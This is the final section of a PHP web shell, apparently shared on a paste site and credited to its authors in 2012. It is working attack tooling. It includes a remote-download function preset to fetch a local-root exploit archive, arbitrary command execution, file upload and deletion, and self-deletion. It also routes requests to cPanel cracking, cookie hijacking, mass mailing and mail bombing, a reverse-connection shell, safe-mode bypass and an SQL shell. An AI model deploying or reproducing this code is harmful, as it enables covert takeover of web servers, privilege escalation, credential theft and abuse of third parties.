  1448. }
  1449.  
  1450. function remote_download_ui()
  1451. {
  1452.     echo "<div id=result><center><h2>Remote File Download</h2><hr /><br /><br /><table class=tbl><form method='GET'><input type=hidden name='path' value=".getcwd()."><tr><td><select style='color:green; background-color:black; border:1px solid #666;' name='type_r_down'><option>WGET</option><option>cURL</option></select></td></tr>
  1453.    <tr><td>URL <input size=50 name='rurlfile' value='ajithkp560.hostei.com/localroot/2.6.x/h00lyshit.zip'></td></tr>
  1454.    <tr><td><input type='submit' class='input_big' value='   >>   ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
  1455. }
  1456.  
  1457. function remote_download_bg()
  1458. {
  1459.     chdir($_GET['path']);
  1460.     global $os;
  1461.     $opt=$_GET['type_r_down'];
  1462.     $rt_ffile=$_GET['rurlfile'];
  1463.     $name=basename($rt_ffile);
  1464.     echo "<div id=result>";
  1465.     switch($opt)
  1466.     {
  1467.         case "WGET":
  1468.             if($os!='win')
  1469.             {
  1470.                 cmd("wget $rt_ffile");
  1471.                 alert("Downloaded Successfully...");
  1472.             }
  1473.             else
  1474.             {
  1475.                 alert("Its Windows OS... WGET is not available");
  1476.             }
  1477.             break;
  1478.         case "cURL":
  1479.             if(function_exists('curl_init'))
  1480.             {
  1481.                 $ch = curl_init($rt_ffile);
  1482.                 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1483.                 $data = curl_exec($ch);
  1484.                 curl_close($ch);
  1485.                 file_put_contents($name, $data);
  1486.                 alert("Download succeeded");
  1487.             }
  1488.             else
  1489.             {
  1490.                 alert("cURL Not Available");
  1491.             }
  1492.             break;
  1493.     }
  1494.     echo "</div>";
  1495. }
  1496.  
  1497. function hex_encode_ui()
  1498. {
  1499.     if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx']))
  1500.     {
  1501.         $tyx=$_POST['tyxxx'];
  1502.         $rezultzz=$_POST['hexinp'];
  1503.         switch($tyx)
  1504.         {
  1505.             case "Encode":
  1506.                 $rzul=PREG_REPLACE("'(.)'e","dechex(ord('\\1'))",$rezultzz);
  1507.                 echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1508.                <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea>
  1509.                <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1510.                Input : <input name='hexinp' size=50 value='input here'><input type=submit value='   >>  ' /><br /><br /><hr /><br /><br /></div>";
  1511.                 break;
  1512.             case "Decode":
  1513.                 $rzul=PREG_REPLACE("'([\S,\d]{2})'e","chr(hexdec('\\1'))",$rezultzz);
  1514.                 echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1515.                <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea>
  1516.                <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1517.                Input : <input name='hexinp' size=50 value='input here'><input type=submit value='   >>  ' /><br /><br /><hr /><br /><br /></div>";
  1518.                 break;
  1519.         }
  1520.     }
  1521.     else
  1522.     {
  1523.         echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1524.        <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>Here visible Your Result</textarea>
  1525.        <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1526.        Input : <input name='hexinp' size=50 value='input here'><input type=submit value='   >>  ' /><br /><br /><hr /><br /><br /></div>";
  1527.     }
  1528. }
  1529.  
  1530. function about_us()
  1531. {
  1532.     echo "<div id=result style='boder:1px double dashed #333'><center><h2>About us</h2><hr /><br /><br />
  1533.    <font color=red><h4>AJITH KP & VISHNU NATH KP</h4></font>
  1534.    We are brothersz & dedicated this to my <br />
  1535.    <font color=green>\"Father [Devadasan KP] and Mother[Prakasini AP]\"</font><br />My classmates and teachers.<br />and my buddy <font color=orange>SREEJU</font>
  1536.    <br />And all friends, teachers in <font color=green>AMSTECK ATRS AND SCIENCE COLLEGE [BCA & BSc]</font>
  1537.    <br /><font color=green>Amteck : Dheeraj, Jhelai, Ashwin, Arjun,etc...<br />
  1538.    ToF : Coded32 [who forced me to concentrate in Programming], Null|Void, Al3x,John,etc.<br />
  1539.    Indishell : d@rkwolf,ash3ll & Sen[Who teach me the first lessons]</font><br /><br /><br /><br /><hr /><br /><br /><br /><br /></center></div>";
  1540. }
  1541.  
  1542. function killme()
  1543. {
  1544.     global $self;
  1545.     echo "<div id=result><center><h2>Good Bye Dear</h2><hr />Dear, Good by... :( Hope You Like me...<br /><br /><br/><hr /><br /><br />";
  1546.     $me=basename($self);
  1547.     unlink($me);
  1548. }
  1549.  
  1550.  
  1551. //////////////////////////////// Frond End Calls ///////////////////////////////
  1552.  
  1553. if(isset($_POST['e_file']) && isset($_POST['e_content_n']))
  1554. {
  1555.     edit_file_bg();
  1556. }
  1557.  
  1558. else if(isset($_REQUEST['killme']))
  1559. {
  1560.     killme();
  1561. }
  1562.  
  1563. else if(isset($_REQUEST['hexenc']))
  1564. {
  1565.     hex_encode_ui();
  1566. }
  1567.  
  1568. else if(isset($_REQUEST['about_us']))
  1569. {
  1570.     about_us();
  1571. }
  1572.  
  1573. else if(isset($_REQUEST['remotefiledown']))
  1574. {
  1575.     remote_download_ui();
  1576. }
  1577.  
  1578. else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path']))
  1579. {
  1580.     remote_download_bg();
  1581. }
  1582.  
  1583. else if(isset($_REQUEST['cpanel_crack']))
  1584. {
  1585.     cpanel_crack();
  1586. }
  1587.  
  1588. else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz']))
  1589. {
  1590.     remote_file_check_bg();
  1591. }
  1592.  
  1593. else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content']))
  1594. {
  1595.     php_ende_bg();
  1596. }
  1597.  
  1598. else if(isset($_REQUEST['remote_server_scan']))
  1599. {
  1600.     remote_file_check_ui();
  1601. }
  1602.  
  1603. else if(isset($_REQUEST['server_exploit_details']))
  1604. {
  1605.     exploit_details();
  1606. }
  1607.  
  1608. else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content']))
  1609. {
  1610.     massmailer_bg();
  1611. }
  1612.  
  1613. else if(isset($_REQUEST['mysqlman']))
  1614. {
  1615.     mysqlman();
  1616. }
  1617.  
  1618. else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content']))
  1619. {
  1620.     mailbomb_bg();
  1621. }
  1622.  
  1623. else if(isset($_REQUEST['cookiejack']))
  1624. {
  1625.     cookie_jack();
  1626. }
  1627.  
  1628. else if(isset($_REQUEST['massmailer']))
  1629. {
  1630.     massmailer_ui();
  1631. }
  1632.  
  1633. else if(isset($_REQUEST['rename']))
  1634. {
  1635.     chdir($_GET['path']);
  1636.     rename_ui();
  1637. }
  1638.  
  1639. else if(isset($_GET['old_name']) && isset($_GET['new_name']))
  1640. {
  1641.     chdir($_GET['path']);
  1642.    
  1643.     rename_bg();
  1644.    
  1645. }
  1646. else if(isset($_REQUEST['encodefile']))
  1647. {
  1648.     php_ende_ui();
  1649. }
  1650. else if(isset($_REQUEST['edit']))
  1651. {
  1652.     edit_file();
  1653. }
  1654. else if(isset($_REQUEST['down']))
  1655. {
  1656.     chdir($_GET['path']);
  1657.     download();
  1658.      
  1659. }
  1660. else if(isset($_REQUEST['read']))
  1661. {
  1662.     chdir($_GET['path']);
  1663.     code_viewer();
  1664.    
  1665. }
  1666. else if(isset($_REQUEST['perm']))
  1667. {
  1668.     chdir($_GET['path']);
  1669.     ch_perm_ui();
  1670. }
  1671. else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm']))
  1672. {
  1673.     chdir($_GET['path']);
  1674.     ch_perm_bg();
  1675. }
  1676.  
  1677. else if(isset($_REQUEST['del_fil']))
  1678. {
  1679.     chdir($_GET['path']);
  1680.     delete_file();
  1681.     exit;
  1682. }
  1683. else if(isset($_REQUEST['phpinfo']))
  1684. {
  1685.     chdir($_GET['path']);
  1686.     ob_clean();
  1687.     echo phpinfo();
  1688.     exit;
  1689. }
  1690. else if(isset($_REQUEST['del_dir']))
  1691. {
  1692.     chdir($_GET['path']);
  1693.     $d_dir=$_GET['del_dir'];
  1694.     deldirs($d_dir);
  1695. }
  1696. else if(isset($_GET['path']) && isset($_GET['new_file']))
  1697. {
  1698.     chdir($_GET['path']);
  1699.     mk_file_ui();
  1700. }
  1701. else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content']))
  1702. {
  1703.     mk_file_bg();
  1704. }
  1705. else if(isset($_GET['path']) && isset($_GET['new_dir']))
  1706. {
  1707.     chdir($_GET['path']);
  1708.     create_dir();
  1709. }
  1710. else if(isset($_GET['path']) && isset($_GET['cmdexe']))
  1711. {
  1712.     chdir($_GET['path']);
  1713.     cmd();
  1714. }
  1715. else if(isset($_POST['upload_f']) && isset($_POST['path']))
  1716. {
  1717.     upload_file();
  1718. }
  1719. else if(isset($_REQUEST['rs']))
  1720. {
  1721.     reverse_conn_ui();
  1722. }
  1723. else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port']))
  1724. {
  1725.     reverse_conn_bg();
  1726. }
  1727. else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path']))
  1728. {
  1729.     chdir($_GET['path']);
  1730.     safe_mode_fuck_ui();
  1731. }
  1732. else if(isset($_GET['path']) && isset($_GET['safe_mode']))
  1733. {
  1734.     safe_mode_fuck();
  1735. }
  1736. else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir']))
  1737. {
  1738.     AccessDenied();
  1739. }
  1740.  
  1741.  
  1742. else if(isset($_REQUEST['symlink']))
  1743. {
  1744.     sym_link();
  1745. }
  1746.  
  1747. else if(isset($_GET['dbz']) && isset($_GET['db_user']) && isset($_GET['db_password']) && isset($_GET['db_port']))
  1748. {
  1749.     SQL_Shell_bg();
  1750. }
  1751. else if(isset($_GET['path']) && isset($_GET['copy']))
  1752. {
  1753.     copy_file_ui();
  1754. }
  1755. else if(isset($_GET['c_file']) && isset($_GET['c_target']) &&isset($_GET['cn_name']))
  1756. {
  1757.     copy_file_bg();
  1758. }
  1759. else
  1760. {
  1761.     filemanager_bg();
  1762. }
  1763.  
  1764. ////////////////////////////// End Frond End Calls //////////////////////////////
  1765.  
  1766.  
  1767. echo "</div><div id=result><center><p><table class='tbl'>
  1768.      <tr><td><form method='GET'>PWD : <input size='50' name='path' value=".getcwd()."><input type='submit' value='   >>   ' /></form></td></tr></table>
  1769.      <table class='tbl'><tr>
  1770.          <td><form style='float:right;' method='GET'><input name='path' value=".getcwd()." type=hidden><span> New File : </span><input type='submit' value='   >>   ' ><input size='40' name='new_file' /></form>
  1771.          </td>
  1772.          <td><form  style='float:left;' method='GET'><input name='path' value=".getcwd()." type=hidden><input size='40' name='new_dir'><input type='submit' value='   >>   ' /><span> : New Dir</span></form>
  1773.          </td>
  1774.      </tr>
  1775.      <tr>
  1776.          <td><form style='float:right;' method='GET'><input style='float:left;' name='path' value=".getcwd()." type=hidden><span>CMD : </span><input type='submit' value='   >>   ' ><input name='cmdexe' size='40' /></form>
  1777.          </td>
  1778.          <td><form style='float:left;' method='POST' enctype=\"multipart/form-data\"><input name='path' value=".getcwd()." type=hidden><input size='27' name='upload_f' type='file'><input type='submit' name='upload_f' value='   >>   ' /><span> : Upload File</span></form>
  1779.          </td>
  1780.        </tr>
  1781.      </table></p><p><font size=4 color=green>&copy <a style='color:green; text-decoration:none;' href=http://facebook.com/ajithkp560>AJITH KP</a> & <a style='color:green; text-decoration:none;' href='http://www.facebook.com/vishnunathkp'>VISHNU NATH KP</a> &copy</font><br />&reg TOF [2012] &reg</div>"
  1782. ?>
Add Comment
Please, Sign In to add comment